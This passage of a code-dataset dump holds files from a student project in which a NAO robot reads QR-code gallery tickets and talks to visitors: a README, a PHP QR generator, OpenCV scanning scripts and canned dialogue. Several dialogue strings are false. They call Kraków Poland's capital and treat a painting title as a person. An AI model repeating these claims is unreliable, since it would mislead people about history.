NaoProject()\n # Calling main function of the class\n main_obj.nao_dialog()\n\nif __name__ == \"__main__\":\n # Connecting to the Choregraphe simulated robot (from Robotic Platform)\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ip\", type=str, default=\"desktop-6d4cqe5.local\",\n help=\"Robot's IP address. If on a robot or a local Naoqi, use '127.0.0.1'.\")\n parser.add_argument(\"--port\", type=int, default=9559,\n help=\"port number, the default value is OK in most cases\")\n args = parser.parse_args()\n session = qi.Session()\n try:\n session.connect(\"tcp://{}:{}\".format(args.ip, args.port))\n except RuntimeError:\n print (\"\\nCan't connect to Naoqi at IP {} (port {}).\\nPlease check your script's arguments.\"\n \" Run with -h option for help.\\n\".format(args.ip, args.port))\n sys.exit(1)\n main(session)\n"
},
{
"alpha_fraction": 0.7019707560539246,
"alphanum_fraction": 0.7111252546310425,
"avg_line_length": 40.592594146728516,
"blob_id": "d64dcdb92b2e867aeeea38f59ec6ee0d4d921bf7",
"content_id": "29302901216eb016e96a241f77e1acb86c91175e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7865,
"license_type": "permissive",
"max_line_length": 569,
"num_lines": 189,
"path": "/README.md",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "\n\n<!-- PROJECT LOGO -->\n\n<p align=\"center\">\n <a href=\"https://github.com/mahlaNasr/nao_robot_project\">\n <img src=\"nao_logo.png\" alt=\"Logo\" width=\"150\" height=\"150\">\n </a>\n <h3 align=\"center\">NGX NAO Robot Project</h3>\n <p align=\"center\">\n Final Year 3 BEng Individual Project\n </p>\n</p>\n\n\n<details open=\"open\">\n <summary>Table of Contents</summary>\n <ol>\n <li><a href=\"#about-the-project\">About The Project</a></li>\n <li>\n <a href=\"#a-booking-web-page-folder\">Booking Web Page folder</a>\n <ul>\n <li><a href=\"#demo-video-for-section-a\">Demo Video for Section (a)</a></li>\n </ul>\n </li>\n <li>\n <a href=\"#b-scripts-english-folder\">Scripts (English) folder</a>\n <ul>\n <li><a href=\"#demo-video-for-section-b\">Demo Video for Section (b)</a></li>\n </ul>\n </li>\n <li>\n <a href=\"#c-scripts-french-folder\">Scripts (French) folder</a>\n <ul>\n <li><a href=\"#demo-video-for-section-c\">Demo Video for Section (c)</a></li>\n </ul>\n </li>\n <li>\n <a href=\"#getting-started-for-virtual-nao\">Getting Started for Virtual NAO</a>\n <ul>\n <li><a href=\"#prerequisites\">Prerequisites</a></li>\n <li><a href=\"#installation\">Installation</a></li>\n </ul>\n </li>\n <li><a href=\"#d-analysing-qr-codes-folder\">Analysing Qr Codes folder</a></li>\n <li>\n <a href=\"#getting-started-for-analysing-qr-codes\">Getting Started for Analysing QR Codes</a></li> \n <ul>\n <li><a href=\"#prerequisites-1\">Prerequisites</a></li>\n <li><a href=\"#installation-1\">Installation</a></li>\n </ul>\n </li>\n <li><a href=\"#contributing\">Contributing</a></li>\n <li><a href=\"#license\">License</a></li>\n <li><a href=\"#contact\">Contact</a></li>\n </ol>\n</details>\n\n\n<!-- ABOUT THE PROJECT -->\n## About The Project\n\nThis project proposes a system where humanoid robot, NAO, uses scanned QR code ticket information to form simple conversations with the visitors at the [**the National Portrait Gallery**](https://www.nationalgallery.org.uk/whats-on/national-gallery-x) art museum.\n\nThere are three folders that are in this repository:\n* (a) booking_website\n* (b) scripts_enu\n* (c) scripts_frf\n* (d) analyse_qrcode\n\n\n\n### [(a)](https://github.com/mahlaNasr/nao_robot_project/tree/master/booking_website) Booking Web Page folder\nTo book a ticket for one of the gallery's events, I made a webpage where it generates a QR code with all the input parameters that you enter. This QR code then gets scanned by the robot to read the JSON file information inside the code. To run the scripts in this folder, [XAMPP](https://www.apachefriends.org/index.html) needs to be set up to run a local server. Write the IP address of your local server along with the directory of where the scripts are saved in the search bar of any search engine. In my case it was: `http://192.168.64.2/booking_website/index.php`.\nMake sure that this folder (a) gets saved inside `htdocs` folder in XAMPP.\n\n\n#### Demo Video for Section (a) \n[Booking a Ticket for National Gallery Museum Demo](https://youtu.be/mtQ_YTJ_wK8)\n\n\n### [(b)](https://github.com/mahlaNasr/nao_robot_project/tree/master/scripts_enu) Scripts (English) folder \nThis folder consists of all the codes that were written for the robot to scan QR codes and interact with the visitors.\nTo run the whole system, write \n `\n python nao_project.py\n `\ncommand in the terminal. A few libraries are needed to be installed in order to run the scripts which are listed below. \nMake sure that you are in the same directory as the python file (i.e. 
`nao_robot_project/scripts_enu`).\n\n#### Demo Video for Section (b)\n[Retrieving QR code Data to Form Personalised Speeches](https://youtu.be/nI8LN00qGhE)\n\n\n### [(c)](https://github.com/mahlaNasr/nao_robot_project/tree/master/scripts_frf) Scripts (French) folder\nThese sets of scripts were added to show future possibilities that can be done with the built system. NAO retrieves the language parameter within a pre-generated JSON file from a pre-scanned QR code that is inside the folder. It then asks the visitors to ask if NAO can speak in French or not. This program is very small and it is recorded below to show how it works. To run this program write\n `\n python nao_french_project.py\n `\ncommand in the terminal. Make sure that you are in the same directory as the python file (i.e. `nao_robot_project/scripts_frf`).\n\n#### Demo Video for Section (c)\n[Personalised Speech Based on the 'Language' Parameter of a QR Code](https://youtu.be/HNX2OmFoa7k)\n\n\n\n<!-- GETTING STARTED -->\n## Getting Started for Virtual NAO \n\nTo be able to run folders (2) and (3), follow these steps below to set up the neccessary applications. \n\n#### Prerequisites \n\nThe older version of python is needed in order to run the software.\n1. Get Python 2.7 from [python official website](https://www.python.org/about/)\n2. Get Choregraphe installed from [ALDebaran documentations](http://doc.aldebaran.com/2-4/software/choregraphe/installing.html)\n3. Get python SDK from [ALDebaran documentations](http://doc.aldebaran.com/2-4/dev/python/install_guide.html)\n\n#### Installation \n\nA few libraries are also needed.\n\n1. Install Computer Vision tools for OpenCV\n ```sh\n pip install opencv-python\n ```\n2. If your python package does not have TKinter pre-installed for the Graphical User Interface (GUI), run this command to install for python 2.7 on Linux\n ```sh\n sudo apt-get install python-tk\n ```\n3. Install pyzbar for reading barcodes using zbar library\n ```sh\n pip install pyzbar\n ```\nOther libraries such as JSON, time, os, argparse, random and qi were imported.\n\n\n\n\n### [(d)](https://github.com/mahlaNasr/nao_robot_project/tree/master/analyse_qrcode) Analysing Qr Codes folder \nThis folder was added to show how the images were analysed and decoded using a few other libraries. The results were then stored onto an Excel sheet.\n\nThere was two ways:\n1. [Real-time scanning](https://github.com/mahlaNasr/nao_robot_project/tree/master/analyse_qrcode/take_process_img) -> `take_process_img` folder\n2. [Analysing images that are already taken](https://github.com/mahlaNasr/nao_robot_project/tree/master/analyse_qrcode/opencv_image_analyse) -> `opencv_image_analyse` folder\n \n \n\n<!-- GETTING STARTED -->\n## Getting Started for Analysing QR Codes\n\n#### Prerequisites \nThese files in this folder were run and tested using python 3.8. \n1. Get Python 3.8 from [python official website](https://www.python.org/about/)\n\n\n#### Installation \nExtra libraries are needed to run this section of scripts as well as comparing the obtained results of images from Excel file.\n\n1. Install Anaconda which comes with a lot of pre-installed libraries. Instruction found in [Anadonda Documentations](https://docs.continuum.io/anaconda/install/).\n\n Alternative method can be found here [through miniconda](https://pandas.pydata.org/pandas-docs/stable/getting_started/install.html).\n2. 
We also need ZBar and OpenCV tools here as well.\n\n\n\n\n<!-- CONTRIBUTING -->\n## Contributing \nThis project was a contributed to help the National Gallery in order to make their ticket scan system automated through using a humanoid robot, NAO.\n\n\n\n<!-- LICENSE -->\n## License \n\nFor distribution, please reference my [code](https://github.com/mahlaNasr/nao_robot_project) and cite my [report](https://drive.google.com/file/d/1tI2FzyNm9XHmyPpshxGPi-ilAd05Y5fe/view?usp=sharing) :)\n\n\n\n\n\n<!-- CONTACT -->\n## Contact \n\nLinks to: \n* [My LinkedIn](https://www.linkedin.com/in/mahla-nasrollahi-0bb679163)\n* [My GitHub](https://github.com/mahlaNasr/) \n* [NAO Project](https://github.com/mahlaNasr/nao_robot_project)\n* [YouTube Videos for Sections (a), (b) and (c)](https://www.youtube.com/watch?v=mtQ_YTJ_wK8&list=PL7HjjvER6Zg1OaPwt4OcNtcNmq3_RAi9l&index=1&ab_channel=MahlaNasrollahi)\n* Project Presentation (coming soon!)\n\n\n"
},
{
"alpha_fraction": 0.4532019793987274,
"alphanum_fraction": 0.46305418014526367,
"avg_line_length": 34.30434799194336,
"blob_id": "005b757a3ae04cb8cf8d4f11f33f06c3f462cb9b",
"content_id": "5c0d12d89ee309caf50f9ef478f3752732ce1910",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 812,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 23,
"path": "/booking_website/input_variables.js",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "// ##########################################################################\n// Author: Mahla Nasrollahi\n// Last Updated: 11/03/2021\n// File Name: ajax_generate_qrcode.js\n//\n// This program is called when the user clicks on the \"Book Now\" button in\n// index.php file. This file captures all the input data by their ID's assigned\n// to them and sends them to generate_qr_code.php file to add them to a QR code.\n// ############################################################################\n\n$(document).ready(function() {\n $(\"#form\").submit(function(){\n $.ajax({\n url:'generate_qrcode.php',\n type:'POST',\n data: {name:$(\"#name\").val(),\n email:$(\"#email\").val(),\n ticket_type:$(\"#ticket_type\").val(),\n interests:$(\"#interests\").val()\n }\n });\n });\n});\n"
},
{
"alpha_fraction": 0.5416828393936157,
"alphanum_fraction": 0.5587437152862549,
"avg_line_length": 28.988372802734375,
"blob_id": "7934136b1eeee07965d4533faf5a8f81fec4227f",
"content_id": "91cd367031f725fe007ee7fb3e9bad0225283657",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2579,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 86,
"path": "/analyse_qrcode/real_time_scan.py",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.8\n# -*- coding: utf-8 -*-\n\n##########################################################################\n# Author: Mahla Nasrollahi\n# Last Updated: 28/03/2021\n# File Name: quick_scan.py\n#\n# This script scans QR code in real-time and creats a json file with the\n# decoded data.\n############################################################################\n\n\n# Imprting related libraries\nfrom pyzbar.pyzbar import decode, pyzbar\nfrom pyzbar import pyzbar\nimport numpy as np\nimport cv2 as cv\nimport json\nimport os\n\njson_filename= 'json_qrdata'\njson_path = \"{}.json\".format(json_filename)\n\n#image = cv2.imread('1.png')\ncap = cv.VideoCapture(0)\ncap.set(3,640)\ncap.set(4,480)\n\nscanned = True\nprint('Please scan your QR code...')\nwhile(scanned):\n success, image = cap.read()\n # find the barcodes in the image and decode if possible\n barcodes = pyzbar.decode(image)\n\n # if no barcode is detected\n if not barcodes :\n if os.path.exists(json_path):\n os.remove(json_path)\n else:\n pass\n else:\n pass\n\n # loop over the detected barcodes\n for barcode in barcodes:\n barcodeData = barcode.data.decode(\"utf-8\")\n with open(json_path, 'w') as scanned_data:\n scanned_data.write(barcodeData)\n\n # Green colour\n myColor = (0, 255, 0)\n pts = np.array([barcode.polygon],np.int32)\n pts = pts.reshape((-1,1,2))\n cv.polylines(image,[pts],True,myColor,5)\n pts2 = barcode.rect\n cv.putText(image,\"myOutput\",(pts2[0],pts2[1]),cv.FONT_HERSHEY_SIMPLEX,0.9,myColor,2)\n\n print('scanned')\n ##To stop the real-time streming when a barcode is presented, uncomment\n ## the following command\n # scanned = False\n\n cv.imshow('Show QR Code Here',image)\n cv.waitKey(1)\n\n\n# Create a Json file of the scanned barcode\ndef json_data(parameter):\n if os.path.exists(json_path):\n with open(json_path, 'r') as jfile:\n data = json.load(jfile)\n for item in data:\n if parameter == \"Name\" or parameter == \"name\":\n name = data[\"Name\"]\n return name\n if parameter == \"Ticket_type\" or parameter == \"ticket_type\" or parameter == \"ticket_Type\":\n tick_type = data[\"Ticket_type\"]\n return tick_type\n if parameter == \"Interest\" or parameter == \"interest\":\n interest = data[\"Interest\"]\n return interest\n else:\n print(\"[INFO] Barcode is not clear\")\n return None\n"
},
{
"alpha_fraction": 0.5708107948303223,
"alphanum_fraction": 0.5767567753791809,
"avg_line_length": 30.89655113220215,
"blob_id": "44ac64e96d2e1aec64630ffedce0b737c409ffcb",
"content_id": "702afcf81d26f3a5d4990da3b06e3172dbc966c5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1850,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 58,
"path": "/booking_website/generate_qrcode.php",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "<!-- ##########################################################################\nAuthor: Mahla Nasrollahi\nLast Updated: 11/03/2021\nFile Name: generate_qr_code.php\n\nThis prgram reads the user inputs from HTML form in index.php and inserts them\ninto a unique QR code. The data inside the QR code is then saved to a Json file\nfor the robot to access and read the data.\n############################################################################-->\n\n<?php\n\n if(isset($_POST) && !empty($_POST)) {\n\n // Import the external qrcode library for php\n include('library/phpqrcode/qrlib.php');\n\n // This a location where generated QR code is to be stored\n $qrcode_file_path = dirname(__FILE__).DIRECTORY_SEPARATOR.'images'.DIRECTORY_SEPARATOR;\n\n // If directory is not created then create a new directory\n if(!file_exists($qrcode_file_path)){\n mkdir($qrcode_file_path);\n }\n\n // Set a secure random file name of each generated QR code image\n $filename\t= $qrcode_file_path.md5(uniqid()).'.png';\n\n // Capture the HTML form data into variables\n\n $name = $_POST['name'];\n $email = $_POST['email'];\n $ticket_type = $_POST['ticket_type'];\n $interests = $_POST['interests'];\n\n // Store all data into an array\n $arr_data = [\n 'Name' => $name,\n 'Email' => $email,\n 'Ticket_type' => $ticket_type,\n 'Interest' => $interests\n ];\n\n // Put the array data into a json file\n $qrcode_data = json_encode($arr_data, JSON_PRETTY_PRINT);\n // QR code properties\n $qrcode_level = 'M';\n $qrcode_size = 5;\n $qrcode_margin = 3;\n\n // Generate the QR code for a user\n // png($text, $outfile=false, $level=QR_ECLEVEL_L, $size, $margin, $saveandprint=false)\n QRcode::png($qrcode_data, $filename, $qrcode_level, $qrcode_size, $qrcode_margin);\n }\n else {\n header('location:./');\n }\n?>\n"
},
{
"alpha_fraction": 0.5819027423858643,
"alphanum_fraction": 0.6140915751457214,
"avg_line_length": 33.51852035522461,
"blob_id": "3267f2be15a492516a7a83beedabfe50897a939c",
"content_id": "7b93416e193939205822cc66994ad26d111a1362",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2796,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 81,
"path": "/booking_website/distance.py",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "# python3 distance_detector.py -f 300 -d 0.51\nimport numpy as np\nimport time\nimport cv2\nimport tkinter\nimport argparse\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-f\", \"--face_height\", type=int, default=300,\n\thelp=\"height of the face in pixels\")\nap.add_argument(\"-d\", \"--distance\", type=float, default=0.51,\n\thelp=\"show warning after if less than that distance in meters\")\nargs = vars(ap.parse_args())\n\ndef create_root():\n \"\"\"Create Tkinter stream (for display a message)\"\"\"\n root = tkinter.Tk()\n root.title(\"Warning!\")\n root.resizable(width=\"false\", height=\"false\")\n root.minsize(width=350, height=50)\n root.maxsize(width=350, height=50)\n text_for_message = \"Warning! You are too close to the monitor\"\n warning_message = tkinter.Text(root)\n warning_message.pack()\n warning_message.insert(tkinter.END, text_for_message)\n return root\n\n# Create initial Tkinter stream\nroot = create_root()\n\ncap = cv2.VideoCapture(0)\n\nface_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')\n\n\nwhile(True):\n # Capture frame-by-frame\n _, frame = cap.read()\n last_time = time.time()\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.1, 5)\n if faces == ():\n root.destroy()\n root = create_root()\n for (x,y,w,h) in faces:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = frame[y:y+h, x:x+w]\n known_height = args['face_height']\n distance = known_height/h*args['distance']\n if distance < args['distance']:\n # If we are too close - send warning\n root.update()\n else:\n # In another case destroy root and make a new one\n root.destroy()\n root = create_root()\n # Display face height at the recognized box\n text = \"Face height: {}\".format(h)\n print(h)\n cv2.putText(frame, text, (int(x), int(y)),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n # Display distance from face to monitor\n cv2.putText(frame, \"%.2fm\" % (distance),\n (frame.shape[1] - 200, frame.shape[0] - 20), cv2.FONT_HERSHEY_SIMPLEX,\n 2.0, (0, 255, 0), 3)\n # Display how comfort recording are (more frames are better):\n cv2.putText(frame, \"FPS: %f\" % (1.0 / (time.time() - last_time)),\n (10, 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n\n # Display the resulting frame\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\nroot.destroy()\ncap.release()\ncv2.destroyAllWindows()\n"
},
{
"alpha_fraction": 0.45234376192092896,
"alphanum_fraction": 0.4566406309604645,
"avg_line_length": 39,
"blob_id": "6f07168df1e84be08dfc56c2bd2befda7d4a5be6",
"content_id": "041d907337b4015409f4b33847dfdc4b34ca1008",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5120,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 128,
"path": "/scripts_frf/nao_scan_lang.py",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n##########################################################################\n# Author: Mahla Nasrollahi\n# Last Updated: 25/03/2021\n# File Name: nao_scan.py\n#\n# This class scans a QR code and checks if it is decodable or not. If it\n# is decodable, the program stores the QR code information into a json file.\n############################################################################\n\n#--------------------------------------------------------------------------\n# Importing necessary packages\n#--------------------------------------------------------------------------\nfrom pyzbar import pyzbar\nimport cv2 as cv\nimport json\nimport os\n\n\nclass NaoScanBarcode:\n def __init__(self):\n # Json file path and direction\n self.json_filename= 'json_qrdata'\n self.json_path = \"{}.json\".format(self.json_filename)\n\n #---------------------------------------------------------------------------\n # Open a window frame for the camera to scan QR code. Also, check if the\n # barcode is decodable or not.\n # Argument: None\n #---------------------------------------------------------------------------\n def scan_qrcode(self):\n # Record whether a QR code is decodable or not in lists\n self.decode_result = []\n\n try:\n # Initialise camera video\n vidStream = cv.VideoCapture(0, cv.CAP_DSHOW)\n vidStream.set(3,640)\n vidStream.set(4,480)\n except:\n print (\"problem opening input stream\")\n sys.exit(1)\n\n print \"[INFO] Scanning QR code...\"\n scanned = True\n while(scanned):\n success, image = vidStream.read()\n # Decode if possible\n barcodes = pyzbar.decode(image)\n\n # if no barcode information is detected\n if not barcodes :\n # Remove old json files\n if os.path.exists(self.json_path):\n os.remove(self.json_path)\n else:\n pass\n self.decode_result.append(\"Decoding Failed\")\n else:\n pass\n\n # loop over the detected barcodes\n for barcode in barcodes:\n barcodeData = barcode.data.decode(\"utf-8\")\n # Save barcode information insidea new json file\n with open(self.json_path, 'w') as scanned_data:\n scanned_data.write(barcodeData)\n self.decode_result.append(\"Decoding Passed\")\n scanned = False\n\n # Show scanning window\n cv.imshow('Show QR Code Here',image)\n cv.waitKey(1)\n\n #---------------------------------------------------------------------------\n # Check if the detected barcode is clear and readable by the camera. If\n # it is clear enough, its values is saved as passed. Otherwise, it is failed.\n # Argument: None\n #---------------------------------------------------------------------------\n def check_readable(self):\n for i in range(len(self.decode_result)):\n if self.decode_result[i] == \"Decoding Passed\":\n return True\n else:\n return False\n\n #---------------------------------------------------------------------------\n # Check if a json file exists first. 
If file exists, find all parameters\n # and data and save save them.\n # Argument: Parameter, type=string, it is the value of the key elements\n # in the json file\n #---------------------------------------------------------------------------\n def json_data(self, parameter):\n if os.path.exists(self.json_path):\n # Read existing json file\n with open(self.json_path, 'r' ) as jfile:\n data = json.load(jfile)\n\n # Loop through all the data inside json file and return them\n for item in data:\n if parameter == \"Name\" or parameter == \"name\":\n name = data[\"Name\"]\n return name\n if parameter == \"Ticket_type\" or parameter == \"ticket_type\" or parameter == \"ticket_Type\":\n tick_type = data[\"Ticket_type\"]\n return tick_type\n if parameter == \"Interest\" or parameter == \"interest\":\n interest = data[\"Interest\"]\n return interest\n if parameter == \"Language\" or parameter == \"language\":\n language = data[\"Language\"]\n return language\n else:\n print(\"[INFO] Barcode is not clear and no json file found\")\n return None\n\n #---------------------------------------------------------------------------\n # Check if a json file exists first. If file exists, delete it along with\n # information inside it when a visitor finishes his/her talk session.\n # Argument: None\n #---------------------------------------------------------------------------\n def remove_json(self):\n if os.path.exists(self.json_path):\n os.remove(self.json_path)\n else:\n pass\n"
},
{
"alpha_fraction": 0.5249730348587036,
"alphanum_fraction": 0.5298239588737488,
"avg_line_length": 53.03883361816406,
"blob_id": "1f7d6dce6cab8d345d234b0127655e5e6f743be9",
"content_id": "a75eee7a9981ab4794ced02945cb9b9026a10e54",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5577,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 103,
"path": "/scripts_enu/nao_talk.py",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n##########################################################################\n# Author: Mahla Nasrollahi\n# Last Updated: 25/03/2021\n# File Name: nao_talk.py\n#\n# This class stores some string dialogs with regards to the different\n# interests inputs that the visitors choose when they book their tickets.\n# The strings are returned randomly for the robot to talk back at the\n# visitors.\n############################################################################\n\n#--------------------------------------------------------------------------\n# Importing necessary packages\n#--------------------------------------------------------------------------\nimport random\nimport json\n\n\n\nclass NaoDialogs:\n def __init__(self):\n pass\n\n #---------------------------------------------------------------------------\n # Introduction on what the NAO is going to talk about next for different\n # interest input values.\n # Argument: None\n #---------------------------------------------------------------------------\n def intro_interest(self):\n speech_interests = [\"I see that you are interested in the \",\n \"Oh you have a fascinating interest in the \",\n \"So your interest lies within the \"]\n return random.choice(speech_interests)\n\n #---------------------------------------------------------------------------\n # This function returns a random string based on what interest parameter\n # visitors have chosen. There are 3 different interest choices:\n # Artist, History and Culture\n # Argument: json_value, type=string, it is the interest choice of the\n # visitor based on their QR code\n #---------------------------------------------------------------------------\n def interest_talk(self, json_value):\n # Based on json file data value from user inputs, choose one statement\n if json_value == \"Artist\":\n about_artist = [\n \"Let me tell you something about Jan Matejko’s Copernicus.\"\\\n \" He was a Polish painter who lived and worked in Kraków. He\"\\\n \" was considered the finest representative of historicism in\"\\\n \" Polish painting and founder of the national school of\"\\\n \" historical painting.\",\n \"Did you know that Jan Matejko’s Copernicus won international\"\\\n \" fame and recognition before he turned thirty? He was mostly\"\\\n \" known for being a Polish history painter. If you ever visit\"\\\n \" the capital of Poland, Krakow, don't forget to visit the\"\\\n \" beautiful monument of Jan Matejko\",\n \"Jan Matejko’s Copernicus had ten siblings and he was the ninth\"\\\n \" from the eleven that his parents had. This Polish painter\"\\\n \" was mostly known for his drawings of notable historical\"\\\n \" Polish political and military events.\"\n ]\n # Pick a random dialog from above list and send it to the robot\n return random.choice(about_artist)\n\n elif json_value == \"History\":\n about_history =[\n \"I will tell you a little history about Matejko. He has won two\"\\\n \" gold medals of 1st classes at the Universal Exhibition in\"\\\n \" Paris one of which was for Rejtan painting in 1867. That\"\\\n \" painting was later bought by the Emperor of Austria\",\n \"Jan Matejk was at a very young age when Kraków was during its\"\\\n \" revolution of 1846 and also witnessed the siege of Kraków in\"\\\n \" 1848 by the Austrians which did not end up being so great for\"\\\n \" the Free City of Kraków.\",\n \"Did you know that Matejk attended St. 
Ann's High School in\"\\\n \" Kraków, Poland, but since he was not performing well, he\"\\\n \" dropped out of school in 1851. However, getting low grades\"\\\n \" in other subjects did not stop him from developing artistic talent.\"\n ]\n return random.choice(about_history)\n\n elif json_value == \"Culture\":\n about_culture = [\n \"According to my research, Polish food, specially the one that\"\\\n \" is called pierogi is very delicious and must be tried at least\"\\\n \" once. Pierogies is kind of a dough filled with different fillings.\"\\\n \" It is usually cooked or baked and is served with the greaves,\"\\\n \" onion or sour cream. I will most likely cook that today when\"\\\n \" I go home.\",\n \"As far as I know, Poland has long winter seasons. So, to\"\\\n \" celebrate the first day of spring, children usually go to\"\\\n \" truancy or make a straw doll with colourful ribbons called\"\\\n \" Marzanna. Adults on the other hand help in setting Marzanna\"\\\n \" on fire and then dropping the doll into the local river.\"\\\n \" This Polish tradition is a peculiar way of saying goodbye to winter.\",\n \"Did you know that Polish people have a popular saying, which\"\\\n \" rougly translates to having a guest in the house is like\"\\\n \" having a God in the house. So you enter a Polish home, expect\"\\\n \" to be treated like a member of the royalty!\"\n ]\n return random.choice(about_culture)\n"
},
{
"alpha_fraction": 0.5125501155853271,
"alphanum_fraction": 0.5276790857315063,
"avg_line_length": 37.10043716430664,
"blob_id": "9baf987b02daee989cd6ce3816b194683bd3edd8",
"content_id": "29a0a244d04edc90fc6da6fa84503e9df01abe6a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8725,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 229,
"path": "/analyse_qrcode/take_process_img/take_process_img.py",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.8\n\n##########################################################################\n# Author: Mahla Nasrollahi\n# Last Updated: 28/03/2021\n# File Name: take_process_img.py\n#\n# This script taken a given number of images and process them to see if they\n# are clear to be recognised in the image and if they are able to be decoded\n############################################################################\n\n\n# import the necessary packages\nfrom pyzbar import pyzbar\nimport time, datetime\nimport pandas as pd\nimport argparse, os\nimport numpy as np\nimport cv2 as cv\n\n# Determine the number of images you want to take in order to be analysed\nmaxFrames = 1\ncpt = 0\n\n\ndecode_result = []\nconfidence_score = []\nimage_direc = 'taken_images/'\ndecoded_img_path = 'decoded_img/'\nfinal_path = 'results/'\ncrop_dir = 'crop_img/'\n\ntry:\n vidStream = cv.VideoCapture(0) # index of your camera\nexcept:\n print (\"problem opening input stream\")\n sys.exit(1)\n\nwhile cpt < maxFrames:\n ret, frame = vidStream.read() # read frame and return code.\n if not ret: # if return code is bad, abort.\n sys.exit(0)\n cv.imshow(\"test window\", frame) # show image in window\n cv.imwrite(\"taken_images/image%i.jpg\" %cpt, frame)\n cpt += 1\n\ndef analye_img():\n for filename in os.listdir(image_direc):\n # Read the image files in directory specified\n if filename.endswith(\".jpg\"):\n image_path = str(os.path.join(image_direc, filename))\n # load the input image\n image = cv.imread(image_path)\n\n\n # find the barcodes in the image and decode each of the barcodes\n barcodes = pyzbar.decode(image)\n font = cv.FONT_HERSHEY_SIMPLEX\n\n # if no barcode is detected\n if not barcodes :\n result_txt = \"Decoding Failed\"\n # get boundary of this text\n textsize = cv.getTextSize(result_txt, font, 1, 2)[0]\n # get coords based on boundary\n textX = (image.shape[1] - textsize[0]) / 2\n textY = (image.shape[0] + textsize[1]) / 2\n cv.putText(image, result_txt, (int(textX), int(textY)), font, 2, (0, 0, 255), 2)\n\n save_decode = str(os.path.join(decoded_img_path, filename))\n cv.imwrite(save_decode, image)\n\n cv.destroyAllWindows()\n cv.waitKey(1)\n\n decode_result.append(result_txt)\n\n\n # loop over the detected barcodes\n for barcode in barcodes:\n # extract the bounding box location of the barcode and draw the\n # bounding box surrounding the barcode on the image\n (x, y, w, h) = barcode.rect\n cv.rectangle(image, (x, y), (x + w, y + h), (0, 255, 255), 3)\n\n # the barcode data is a bytes object so if we want to draw it on\n # our output image we need to convert it to a string first\n barcodeData = barcode.data.decode(\"utf-8\")\n barcodeType = barcode.type\n # draw the barcode data and barcode type on the image\n text = \"{} ({})\".format(barcodeData, barcodeType)\n result_txt = \"Decoding Passed\"\n cv.putText(image, result_txt, (x, y - 10), font, 1, (0, 255, 0), 1)\n\n save_decode = str(os.path.join(decoded_img_path, filename))\n cv.imwrite(save_decode, image)\n\n cv.destroyAllWindows()\n cv.waitKey(1)\n\n decode_result.append(result_txt)\n\n\ndef conf_score():\n for filename in os.listdir(decoded_img_path):\n if filename.endswith(\".jpg\"):\n image = str(os.path.join(decoded_img_path, filename))\n # Load an image\n frame = cv.imread(image)\n\n threshold = 0.6\n maxWidth = 1280; maxHeight = 720\n imgHeight, imgWidth = frame.shape[:2]\n hScale = 1; wScale = 1\n thickness = 1\n\n if imgHeight > maxHeight:\n hScale = imgHeight / maxHeight\n thickness = 6\n\n if imgWidth > maxWidth:\n 
